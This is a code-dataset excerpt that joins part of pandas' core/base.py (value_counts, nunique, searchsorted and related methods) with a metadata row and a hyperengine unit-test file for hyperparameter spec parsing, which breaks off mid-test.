        dtype: int64

        **dropna**

        With `dropna` set to `False` we can also see NaN index values.

        >>> s.value_counts(dropna=False)
        3.0    2
        1.0    1
        2.0    1
        4.0    1
        NaN    1
        dtype: int64
        """
        # Thin wrapper: the actual work lives in
        # pandas.core.algorithms.value_counts.
        return value_counts(
            self,
            sort=sort,
            ascending=ascending,
            normalize=normalize,
            bins=bins,
            dropna=dropna,
        )
    def unique(self):
        """
        Return the unique values of the underlying data.
        """
        values = self._values
        if not isinstance(values, np.ndarray):
            # ExtensionArray path (includes datetime/timedelta arrays).
            result: ArrayLike = values.unique()
            if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
                # GH#31182 Series._values returns EA, unpack for backward-compat
                if getattr(self.dtype, "tz", None) is None:
                    result = np.asarray(result)
        else:
            result = unique1d(values)
        return result
    def nunique(self, dropna: bool = True) -> int:
        """
        Return number of unique elements in the object.

        Excludes NA values by default.

        Parameters
        ----------
        dropna : bool, default True
            Don't include NaN in the count.

        Returns
        -------
        int

        See Also
        --------
        DataFrame.nunique: Method nunique for DataFrame.
        Series.count: Count non-NA/null observations in the Series.

        Examples
        --------
        >>> s = pd.Series([1, 3, 5, 7, 7])
        >>> s
        0    1
        1    3
        2    5
        3    7
        4    7
        dtype: int64

        >>> s.nunique()
        4
        """
        uniqs = self.unique()
        if dropna:
            # Strip NA entries from the uniques before counting.
            uniqs = remove_na_arraylike(uniqs)
        return len(uniqs)
@property
def is_unique(self) -> bool:
"""
Return boolean if values in the object are unique.
Returns
-------
bool
"""
return self.nunique(dropna=False) == len(self)
    @property
    def is_monotonic(self) -> bool:
        """
        Return boolean if values in the object are
        monotonic_increasing.

        Returns
        -------
        bool
        """
        # Delegate to Index, which implements the monotonicity check;
        # local import avoids a circular dependency at module load.
        from pandas import Index

        return Index(self).is_monotonic
    @property
    def is_monotonic_increasing(self) -> bool:
        """
        Alias for is_monotonic.
        """
        # mypy complains if we alias directly
        return self.is_monotonic
    @property
    def is_monotonic_decreasing(self) -> bool:
        """
        Return boolean if values in the object are
        monotonic_decreasing.

        Returns
        -------
        bool
        """
        # Delegate to Index; local import avoids a circular dependency.
        from pandas import Index

        return Index(self).is_monotonic_decreasing
    def _memory_usage(self, deep: bool = False) -> int:
        """
        Memory usage of the values.

        Parameters
        ----------
        deep : bool, default False
            Introspect the data deeply, interrogate
            `object` dtypes for system-level memory consumption.

        Returns
        -------
        bytes used

        See Also
        --------
        numpy.ndarray.nbytes : Total bytes consumed by the elements of the
            array.

        Notes
        -----
        Memory usage does not include memory consumed by elements that
        are not components of the array if deep=False or if used on PyPy
        """
        if hasattr(self.array, "memory_usage"):
            # Extension arrays that know their own footprint report it directly.
            # https://github.com/python/mypy/issues/1424
            # error: "ExtensionArray" has no attribute "memory_usage"
            return self.array.memory_usage(deep=deep)  # type: ignore[attr-defined]

        v = self.array.nbytes
        if deep and is_object_dtype(self) and not PYPY:
            # Object dtype stores pointers; add the boxed objects' sizes.
            # (Skipped on PyPy, where per-object sizing is unreliable.)
            values = cast(np.ndarray, self._values)
            v += lib.memory_usage_of_objects(values)
        return v
    # Docstring is rendered by @doc from algorithms.factorize's template,
    # with the shared-parameter sections blanked/overridden below.
    @doc(
        algorithms.factorize,
        values="",
        order="",
        size_hint="",
        sort=textwrap.dedent(
            """\
            sort : bool, default False
                Sort `uniques` and shuffle `codes` to maintain the
                relationship.
            """
        ),
    )
    def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
        # Thin wrapper over pandas.core.algorithms.factorize.
        return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
    @final
    def _duplicated(
        self, keep: Literal["first", "last", False] = "first"
    ) -> npt.NDArray[np.bool_]:
        # Boolean mask marking duplicated entries; delegates to the shared
        # module-level `duplicated` on the underlying values.
        return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
    def _construct_result(self, result, name):
        """
        Construct an appropriately-wrapped result from the ArrayLike result
        of an arithmetic-like operation.

        Abstract here; concrete subclasses must override.
        """
        raise AbstractMethodError(self)
| pandas/core/base.py | 38,591 | Common ops mixin to support a unified interface / docs for Series / Index
Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
call to `self.__freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
Baseclass for various pandas objects.
mixin implementing the selection & aggregation interface on a group-like
object sub-classes need to define: obj, exclusions
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
Return a string representation for a particular object.
Generates the total memory usage for an object that returns
either a value or Series of values
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
Class constructor (for this class it's just `__class__`).
Prevents setting additional attributes.
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
mapping function
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
If the function returns a tuple with more than one element
a MultiIndex will be returned.
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False or if used on PyPy
Perform the reduction type operation if we can.
Reset cached properties. If ``key`` is passed, only clears that key.
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
Consider dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
The maximum cereal calories is the third element and
the minimum cereal calories is the first element,
since series is zero-indexed.
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
``.array`` differs from ``.values``, which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
Return if I have any nans; enables various perf speedups.
Return boolean if values in the object are
monotonic_increasing.
Returns
-------
bool
Return boolean if values in the object are
monotonic_decreasing.
Returns
-------
bool
Alias for is_monotonic.
Return boolean if values in the object are unique.
Returns
-------
bool
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
Return the number of bytes in the underlying data.
Number of dimensions of the underlying data, by definition 1.
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
Return a tuple of the shape of the underlying data.
Return the number of elements in the underlying data.
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensures that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
apparitions of values, divide the index in the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
Base and utility classes for pandas objects.
results from calls to methods decorated with cache_readonly get added to _cache Should be overwritten by base classes no memory_usage attribute, so fall back to object's 'sizeof' prevent adding any attribute via s.xxx.new_attribute = ... _cache is used by a decorator We need to check both 1.) cls.__dict__ and 2.) getattr(self, key) because 1.) getattr is false for attributes that raise errors 2.) cls.__dict__ doesn't traverse into base classes equivalent to `self.obj.drop(self.exclusions, axis=1) but this avoids consolidating and making a copy ndarray compatibility tolist is not deprecated, just suppressed in the __dir__ must be defined here as a property for mypy must be defined here as a property for mypy We need this defined here for mypy error: Too many arguments for "to_numpy" of "ExtensionArray" type: ignore[call-arg] TODO(GH-24345): Avoid potential double copy error: Incompatible return value type (got "Union[int, ndarray]", expected "int") type: ignore[return-value] error: Incompatible return value type (got "Union[int, ndarray]", expected "int") type: ignore[return-value] check for ndarray instead of dtype to catch DTA/TDA We are explicitly making element iterators. Check type instead of dtype to catch DTA/TDA we can fastpath dict/Series to an efficient map as we know that we are not going to have to yield python types If a dictionary subclass defines a default value method, convert mapper to a lookup function (GH 15999). Dictionary does not have a default. Thus it's safe to convert to an Series for efficiency. we specify the keys here to handle the possibility that they are tuples The return value of mapping with an empty mapper is expected to be pd.Series(np.nan, ...). 
As np.nan is of dtype float64 the return value of this method should be float64 as well Since values were input this means we came from either a dict or a series and mapper should be an index use the built in categorical series mapper which saves time by mapping the categories instead of all values we must convert to python types GH23179 some EAs do not have `map` mapper is a function GH31182 Series._values returns EA, unpack for backward-compat mypy complains if we alias directly https://github.com/python/mypy/issues/1424 error: "ExtensionArray" has no attribute "memory_usage" type: ignore[attr-defined] error: Value of type "IndexOpsMixin" is not indexable type: ignore[index] | 16,007 | en | 0.607412 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'maxim'
import six
import unittest
from hyperengine.spec import *
class SpecTest(unittest.TestCase):
  """Tests for ParsedSpec: hyper-parameter node counting (size()) and
  instantiation of a spec from a vector of unit-interval values."""
  def test_zero_nodes(self):
    # Specs with no hyper-parameter nodes: size 0, instantiate is identity.
    def check_zero_nodes(spec):
      parsed = ParsedSpec(spec)
      self.assertEqual(parsed.size(), 0)
      self.assertEqual(spec, parsed.instantiate([]))
    check_zero_nodes(1)
    check_zero_nodes([])
    check_zero_nodes([1, 2, 3])
    check_zero_nodes((1, 2, 3))
    check_zero_nodes({})
    check_zero_nodes({'a': 0, 'b': 1})
    check_zero_nodes({'a': [1, 2], 'b': {'key': (1, 2)}})
  def test_uniform(self):
    # uniform() maps the unit interval linearly onto its (default) [0, 1] range.
    spec = uniform()
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(0.0, parsed.instantiate([0.0]))
    self.assertEqual(0.5, parsed.instantiate([0.5]))
    self.assertEqual(1.0, parsed.instantiate([1.0]))
  def test_uniform_rev(self):
    # Bounds may be passed in either order.
    spec = uniform(4, 0)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(0.0, parsed.instantiate([0.0]))
    self.assertEqual(2.0, parsed.instantiate([0.5]))
    self.assertEqual(4.0, parsed.instantiate([1.0]))
  def test_uniform_negative(self):
    spec = uniform(-4, -2)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(-4.0, parsed.instantiate([0.0]))
    self.assertEqual(-3.0, parsed.instantiate([0.5]))
    self.assertEqual(-2.0, parsed.instantiate([1.0]))
  def test_uniform_negative_rev(self):
    spec = uniform(-2, -4)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(-4.0, parsed.instantiate([0.0]))
    self.assertEqual(-3.0, parsed.instantiate([0.5]))
    self.assertEqual(-2.0, parsed.instantiate([1.0]))
  def test_normal(self):
    # Inputs are treated as CDF values; expected outputs are standard normal
    # quantiles (see test_name_2: the node is backed by stats.norm.ppf).
    spec = normal()
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertAlmostEqual(-1.0, parsed.instantiate([0.1587]), delta=0.001)
    self.assertAlmostEqual(-0.5, parsed.instantiate([0.3085]), delta=0.001)
    self.assertAlmostEqual( 0.0, parsed.instantiate([0.5000]), delta=0.001)
    self.assertAlmostEqual( 0.7, parsed.instantiate([0.7580]), delta=0.001)
    self.assertAlmostEqual( 0.9, parsed.instantiate([0.8159]), delta=0.001)
  def test_choice(self):
    spec = choice([10, 20, 30])
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(10, parsed.instantiate([0.0]))
    self.assertEqual(20, parsed.instantiate([0.5]))
    self.assertEqual(30, parsed.instantiate([1.0]))
  def test_choice_str(self):
    spec = choice(['foo', 'bar'])
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual('foo', parsed.instantiate([0.0]))
    self.assertEqual('bar', parsed.instantiate([1.0]))
  def test_merge(self):
    spec = merge([uniform(), uniform()], lambda x, y: x+y)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 2)
    self.assertEqual(0.5, parsed.instantiate([0.0, 0.5]))
    self.assertEqual(1.5, parsed.instantiate([0.5, 1.0]))
    self.assertEqual(2.0, parsed.instantiate([1.0, 1.0]))
  def test_transform(self):
    spec = wrap(uniform(), lambda x: x*x)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(0.0, parsed.instantiate([0.0]))
    self.assertEqual(4.0, parsed.instantiate([2.0]))
  def test_transform_merge(self):
    spec = wrap(merge([uniform(), uniform()], lambda x, y: x+y), lambda x: x*x)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 2)
    self.assertEqual(1.0, parsed.instantiate([0.0, 1.0]))
    self.assertEqual(4.0, parsed.instantiate([1.0, 1.0]))
  def test_duplicate_nodes_1(self):
    # The same node object referenced several times counts once toward size().
    node = uniform()
    spec = merge([node, node, node], lambda x, y, z: x+y+z)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(3.0, parsed.instantiate([1.0]))
    self.assertEqual(9.0, parsed.instantiate([3.0]))
  def test_duplicate_nodes_2(self):
    node = uniform()
    spec = [[node, node]]
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual([[1.0, 1.0]], parsed.instantiate([1.0]))
  def test_duplicate_nodes_3(self):
    spec = [uniform()] * 3
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual([0.0, 0.0, 0.0], parsed.instantiate([0.0]))
    self.assertEqual([1.0, 1.0, 1.0], parsed.instantiate([1.0]))
  def test_merge_choice(self):
    # A choice over sub-specs exposes the sub-spec nodes plus the selector node.
    spec = choice([uniform(0, 1), uniform(2, 3)])
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 3)
    self.assertEqual(0.0, parsed.instantiate([0.0, 0.0, 0.0]))
    self.assertEqual(1.0, parsed.instantiate([1.0, 0.0, 0.0]))
    self.assertEqual(2.0, parsed.instantiate([0.0, 0.0, 0.9]))
    self.assertEqual(3.0, parsed.instantiate([0.0, 1.0, 0.9]))
  def test_if_condition(self):
    # merge() with a branching function yields conditionally-shaped specs.
    def if_cond(switch, size, num):
      if switch > 0.5:
        return [size, num, num]
      return [size, num]
    spec = merge([uniform(0, 1), uniform(1, 2), uniform(2, 3)], if_cond)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 3)
    self.assertEqual([1, 2], parsed.instantiate([0, 0, 0]))
    self.assertEqual([2, 3], parsed.instantiate([0, 1, 1]))
    self.assertEqual([1, 2, 2], parsed.instantiate([1, 0, 0]))
    self.assertEqual([2, 3, 3], parsed.instantiate([1, 1, 1]))
  def test_object(self):
    class Dummy: pass
    # NOTE(review): this assigns the class object itself (no parentheses),
    # not an instance; the spec walks class attributes. Confirm intended.
    dummy = Dummy
    dummy.value = uniform()
    dummy.foo = 'bar'
    dummy.ref = dummy
    spec = dummy
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    instance = parsed.instantiate([0])
    self.assertEqual(0, instance.value)
    self.assertEqual('bar', instance.foo)
    self.assertEqual(instance, instance.ref)
  def test_dict(self):
    # NOTE(review): merge() is called here as (function, node), the reverse of
    # the ([nodes], function) order used above -- presumably both are supported.
    spec = {1: uniform(), 2: choice(['foo', 'bar']), 3: merge(lambda x: -x, uniform())}
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 3)
    self.assertEqual({1: 0.0, 2: 'foo', 3: 0.0}, parsed.instantiate([0, 0, 0]))
    self.assertEqual({1: 1.0, 2: 'bar', 3: -1.0}, parsed.instantiate([1, 1, 1]))
  def test_dict_deep_1(self):
    spec = {1: {'foo': uniform() } }
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
  def test_dict_deep_2(self):
    spec = {'a': {'b': {'c': { 'd': uniform() } } } }
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
  def test_math_operations_1(self):
    # Spec nodes support arithmetic operator overloading with constants.
    spec = uniform() + 1
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(2.0, parsed.instantiate([1.0]))
  def test_math_operations_2(self):
    spec = uniform() * (uniform() ** 2 + 1) / uniform()
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 3)
    self.assertEqual(2.0, parsed.instantiate([1.0, 1.0, 1.0]))
    self.assertEqual(1.0, parsed.instantiate([0.5, 1.0, 1.0]))
    self.assertEqual(1.0, parsed.instantiate([0.5, 0.0, 0.5]))
  def test_math_operations_3(self):
    # Reflected operators (constant on the left) work as well.
    spec = 2 / (1 + uniform()) * (3 - uniform() + 4 ** uniform())
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 3)
    self.assertEqual(6.0, parsed.instantiate([1.0, 1.0, 1.0]))
  def test_math_operations_4(self):
    # String concatenation of choice nodes.
    spec = choice(['foo', 'bar']) + '-' + choice(['abc', 'def'])
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 2)
    self.assertEqual('foo-abc', parsed.instantiate([0.0, 0.0]))
    self.assertEqual('bar-def', parsed.instantiate([1.0, 1.0]))
  def test_min_1(self):
    # min/max accept a mix of nodes and plain constants.
    spec = min(uniform(), uniform(), 0.5)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 2)
    self.assertEqual(0.5, parsed.instantiate([1.0, 0.7]))
    self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
    self.assertEqual(0.0, parsed.instantiate([0.0, 0.5]))
  def test_min_2(self):
    spec = min(uniform(), 0.8, 0.5)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(0.5, parsed.instantiate([1.0]))
    self.assertEqual(0.5, parsed.instantiate([0.5]))
    self.assertEqual(0.2, parsed.instantiate([0.2]))
  def test_min_3(self):
    spec = min(uniform(), uniform())
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 2)
    self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
    self.assertEqual(0.2, parsed.instantiate([0.2, 0.5]))
  def test_max_1(self):
    # max over constants only: no nodes, constant result.
    spec = max(0.5)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 0)
    self.assertEqual(0.5, parsed.instantiate([]))
  def test_max_2(self):
    spec = max(0.5, 1.0)
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 0)
    self.assertEqual(1.0, parsed.instantiate([]))
  def test_max_3(self):
    spec = max(uniform())
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 1)
    self.assertEqual(1.0, parsed.instantiate([1.0]))
    self.assertEqual(0.0, parsed.instantiate([0.0]))
  def test_name_1(self):
    # Nodes pick up their dict keys and node type as part of name().
    aaa = uniform()
    bbb = choice(['foo'])
    ccc = uniform(-1, 1)
    ddd = uniform()
    spec = {'aaa': aaa, 'bbb': bbb, 'ccc': ccc **2, 'ddd': [ddd, ddd]}
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 4)
    self.assertTrue('aaa' in aaa.name())
    self.assertTrue('uniform' in aaa.name())
    self.assertTrue('bbb' in bbb.name())
    self.assertTrue('choice' in bbb.name())
    self.assertTrue('ccc' in ccc.name())
    self.assertTrue('uniform' in ccc.name())
    self.assertTrue('ddd' in ddd.name())
    self.assertTrue('uniform' in ddd.name())
  def test_name_2(self):
    # Nested dict keys are joined with '-' in the reported node name.
    norm_node = normal()
    choice_node = choice([uniform(), uniform(), uniform()])
    spec = {'a': {'b': {'c': { 'd': norm_node, 0: choice_node } } } }
